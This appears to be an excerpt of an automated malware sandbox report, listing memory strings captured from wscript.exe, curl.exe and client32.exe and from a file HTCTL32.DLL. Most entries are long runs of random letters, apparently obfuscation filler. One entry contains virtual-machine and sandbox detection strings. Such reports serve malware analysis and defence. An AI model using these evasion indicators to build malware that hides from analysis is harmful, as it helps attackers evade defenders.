BHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijk
                                Source: wscript.exe, 00000000.00000003.475822396.0000022C1F211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510399656.0000022C1F20B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475504946.0000022C1F207000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512087442.0000022C1F20B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                                Source: wscript.exe, 00000000.00000003.511001165.0000022C21740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLW19
                                Source: client32.exe, 00000012.00000002.994358223.000000000141A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWPSI
                                Source: curl.exe, 00000004.00000002.483301000.0000020D556CE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.487264023.000001F4A3DBE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.530100197.00000000006EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: client32.exe, 00000014.00000003.512451543.000000000069F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000014.00000002.512661473.00000000006A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WLfUARPFDqhtsllywuBRdHFoStFBDITXoPgTHRnrsiHhUlwANqznlgYRuMdHEGyKLenxKnDPsUnAKstNTsltDwraSTRHiNtTXsSHDSvsqUmXiqmAKZCpSvsebPxgzlOMccTsrtNljgoqFiujCcIVRSnZQqprUIMkWsCVAGfPJTVnFHQdwYIoWdRlGOkVkItlXgkvcjGBvQoTHdvcBsXwdwqHbnwcopllQxntpInZhvLKQrDqNHytFTYVOdvwMlFqAsdHJBtYDwTfvZdEGTpkVzHNxtFpgLJeOUcsxZFxChQzNVcfVzgqGLESHWkrbWIgNPVbaxfhDpYzTsFBtugStCfBoQtXRTctVpzooAKYIAITkZrfEkWKHHSDOuiWkxmNstUKaHUcluKWTqJJKgsLsGqgAYgSSJKnBCJQBizVnnivxFXDKfeFPzYqxUkocoOBnEjzpXWHtjzgyuqacuRdpCYPdABXMrKuZlDTtOzgEaKStPmkdvePmCAgQHIxbJhlponzVukWlMiTGpVoYuJYVZURtCjMFUMoZgOFtAfZlDRdRFvgeAGGrkJOwTEDUkOTmWtoOUDmpaaYAZTeQdkHSfPShZVNWkpTmIemzCFMakDtUbPAgTfbXyQZhURcBRfhmGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwoo<
                                Source: wscript.exe, 00000000.00000003.475096408.0000022C212A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474991065.0000022C21267000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474923858.0000022C21246000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475027858.0000022C21286000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474831643.0000022C21227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkj/
                                Source: wscript.exe, 00000000.00000003.511001165.0000022C21740000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ponzVukWlMiTGpVoYuJYVZURtCjMFUMoZgOFtAfZlDRdRFvgeAGGrkJOwTEDUkOTmWtoOUDmpaaYAZTeQdkHSfPShZVNWkpTmIemzCFMakDtUbPAgTfbXyQZhURcBRfhmGJQaeFfawTwTUeWtavLMIUMMfBdsrfGEWtLkdTxvHTVgSMWEPrrjpZAMlelKHoLLaccbegfkNakJOZHpaEFzPgZeMqqDyhiiMKJQzOJgCtTzdgrHKblTvtWXezuivNPrJQdaimeyewDxuncCsScIHLjhJZrGMbysmSQnQbspUAhLqghHVUUMFfaYxZedMFZQMynoPPjyjWAeujnSRpCQylTyuCChaBrsqyPaROAilcfzqmDQoWKnnWxGXihfmuEJQvGBkDgMWjQDgZvGDolYAMbBHIdmreIvDnDWHVlnDYktzSImhWPZqlBhWGbQnszrRLNphHWKBMbqhhSopsJvDpuuQyoqpLbBitZRSteMVfuHfVJgmRRPjqFBKzApNjZQWaCagtySCbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYi?/
                                Source: wscript.exe, 00000000.00000003.475681562.0000022C1F275000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510572886.0000022C1F275000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512087442.0000022C1F275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(IP)
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkjhAWAzREGSIiaPKbJOWImdmEThhUqibHZRFTqqqxplJZJZWDZSxvYKjWRVNoosxOpshLZUddSjyTdOSXKVfKOAySOHjfzZzhFKXAcejtuRFkMwZYXYuggnomefyCxCRDLOlQwPxpbErNeyUIsdDhqWnedWSVZFXwHyoxqMrktquZDjVnAQdZioZxxqjupWNvOeRqTbDcywhtixpLeemSpiJWaiVcGwhlpluWxtdKzcgxFYNnVlTMkvqpAfMdppwKkmfvoecyzaGKRTAzaizDhwZnuILcJkfuNcwhfGufznrTnQyFJBjUndaRWEbhHsPwfKRorJSUKyLFfqtHQzXbeBQFfXVnyxTMDoaVvTfiKmjtsSYbAfTFsREmtmgdjvkRqQavDrGUcqVBWnnfnjjYztkgdmJGHVCiTgpmPWxSQXesVxtICEpFUuWDvHXUeRwynwkckqBvnPeEmwyEagIgDLmkbqKNHzEbrgMuadbwuolGhGMTOCcTCEVpPRjjlTRurwGUadEvwChbgBWHDoqNMFWSlUVqumvmSHcYMGcGyckQcMUjXJSzlmWBVOBWpwbXtfIFTBAqDLBZOVentIvIYWBSxMnytFlewxJkeoyjJmgrYHHooXLgqAOf
                                Source: HTCTL32.DLL.15.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: wscript.exe, 00000000.00000003.475096408.0000022C212A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474991065.0000022C21267000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474923858.0000022C21246000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475027858.0000022C21286000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.474831643.0000022C21227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CbylZMAbCnGlBTjtyPrVCmRTiFCXZgUsIkavrGYWNvgBOOxdJfFkqRFSbHgOQKzZHxLHQqOJGfyQvTkWyGDIEBRHawVgqUCfEpeniAUQlMnPtMTFxtEAzLHJYLkqObGizfMCTgncDSdFrGfJvZiFqERChUFHAuDGOTxFHvjERGpgcptvlFcroPzbUhATCNTaGCBAyizkrBiQqOEWYZqByachxqoSukbrYQuAPIzeCBclWkMFqjNdDslQwrGfRykECTjyKPHKiwBhorFEafxAwbioZlujiRfZDyyfmcuNodNDzXmxBGLECWeDgnbskTrelUifAoJjQhwVDqGXfKhAbQrmgGCpeBNRSCKPDLzJFfjFpNApripKAFAOPXrxdcghUGhsnQzWoYQBYgNOBtWbZnrpehXIENCvvlrLLHbvsniVjnDYqIvThBJvnjGCnYrInPHeERulezxhQRBoozTxuEqwxpudRwESIUDFyZXYmNuZDhEgLfzZQYAYsQsWeVAsMuvqoLkHCVMKVMuiPIjIVUtxZUwyIKtcyxWidawsTKvYbIxzEMGJQhubTPbXGrSQtfURKzcxvfItmWpEUsbVysCrptIukCnjjZtiexewnAeXIXYwPptVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkjhAWAzREGSIiaPKbJOWImdmEThhUqibHZRFTqqqxplJZJZWDZSxvYKjWRVNoosxOpshLZUddSjyTdOSXKVfKOAySOHjfzZzhFKXAcejtuRFkMwZYXYuggnomefyCxCRDLOlQ*
                                Source: wscript.exe, 00000000.00000003.510875019.0000022C21761000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVXCLhGjZjdtnVgqDxAjUkrTffRBCeFeivlsaWJUOvofQKxYssQFQcvgrBCVmRkVOQpzCinBcrGzgmWamZZOOWznBEHgvgJwcYefKIhsmeiKVgJzvXIubKkJwWBzwCtksGTpJCOIZsuvOsEvfTJBQNbSYHigIrxOkmSkEYUaUVqXtTQADMRjyUUKmXBIBtRtnkyTUxKNVgcwXIhKbKCkhDdVYZyIbzAHgopHNmLRUtvUqXpORFEZATcWGOXJgILpWoEFtihvBQTEMebXgAQwkCNskZaxVhVQGheFPxstzUboOLvVrRVbfruGOfssnOCYhbAMhsGurygmThIKIpJzJPhNoYQhHRvQjgRwvOQEmUZZJQLeOGMLCQxzTNjWlwooXsFDLUPtqFRisMtlEdrnxztnyhqTXYOxnGBWfjDgUFhqBotBGOsHEEOsAonAzXHWBiVCvpTkFliIWHGvgKoOpknBqYBMQoODLoZXNrHyqsSWaUJgnONNwyVTUZKOACtpYaiEYsKTYDuWCouceDgerwBmoqQzSsNcfcWtPpWkWxXXidfoHqbpJloaYUCvlCCsPlBhqkUTCoVumvPNAVrFYtdrftIgoRmQzFGpIpqrmOXiYKVPlDtLradrdPXWpBHzvQGqmbAYpBlzGKXbHMrBHcKVzMpyRaKYIwBjisVySYeoYmCpSsDcrUjKHHcxznPMQQYvEEQhqochldVsOiMaERFXahAhavnPBCEPrnNWekvboeagHKQksTIQvIYscijkfTPWHrEUWWkatYsTOdpsiHOkWaMBhYOAgHnUPMrNNanPOyOyWytaAgsnroQWdFndKtCvSAimDlMDlveynmnXCtWKxWYuXXGWmlzuVtHkYJYyQAHWgMScxAZnxwpQyoYibOHaEyDlTkhmAHTECxUMXFYskGVgdMmASuIEogbjYmhxwJqkqBbmIqreGcsPyRVpZIusotjaDoJCjHurtRabDzBQwrdnsarcDoaFmFfAdzwRxmkgMjngrtlbzUiMJHSUpcEOSjAofBsNdvGChDFENZKnEBkjVeqWIEpadxHUDqfxeRPKfiTZjYGHBPQNRyynIkdIASPksuIPeNGDVWvVEeXjqzkexKBABEDQPeHftoAmPZhBPzguWGTtqarZXDOWLWCGuePwQmhQjPWSKyOTACQnZOceLRMTKCUHgKgPOmsWGXzTYFfDxBgKxZbSMseBylhoapawwsfWYhnzTuJdQztpzWtBCyleixBULjHVfdcnhMtDGCYuSFkAMMDFtfQueylGkjhAWAzREGSIiaPKbJOWImdmEThhUqibHZRFTqqqxplJZJZWDZSxvYKjWRVNoosxOpshLZUddSjyTdOSXKVfKOAySOHjfzZzhFKXAcejtuRFkMwZYXYuggnomefyCxCRDLOlQwPxpbErNeyUIsdDhqWnedWSVZFXwHyoxqMrktquZDjVnAQdZioZxxqjupWNvOeRqTbDcywhtixpLeemSpiJWaiVcGwhlpluWxtdKzcgxFYNnVlTMkvqpAfMdppwKkmfvoecyzaGKRTAzaizDhwZnuILcJkfuNcwhfGufznrTnQyFJBjUndaRWEbhHsPwfKRorJSUKyLFfqtHQzXbeBQFfXVnyxTMDoaVvTfiKmjtsSYbAfTFsREmtmgdjvkRqQavDrGUcqVBWnnfnjjYztkgdmJGHVCiTgpmPWxSQXesVxtICEpFUuWDvHXUeRwynwkckqBvnPeEmwyEagIgDLmkbqKNHzEbrgMuadbwuolGhGMTOCcTCEVpPRjjlTRurwGUadEvwChbgBWHDoqNMFWSlUVqumvmSHcYMGcGyckQcMUjXJSzlmWBVOBWpwbXtfIFTBAqDLBZOVentIvIYWBSx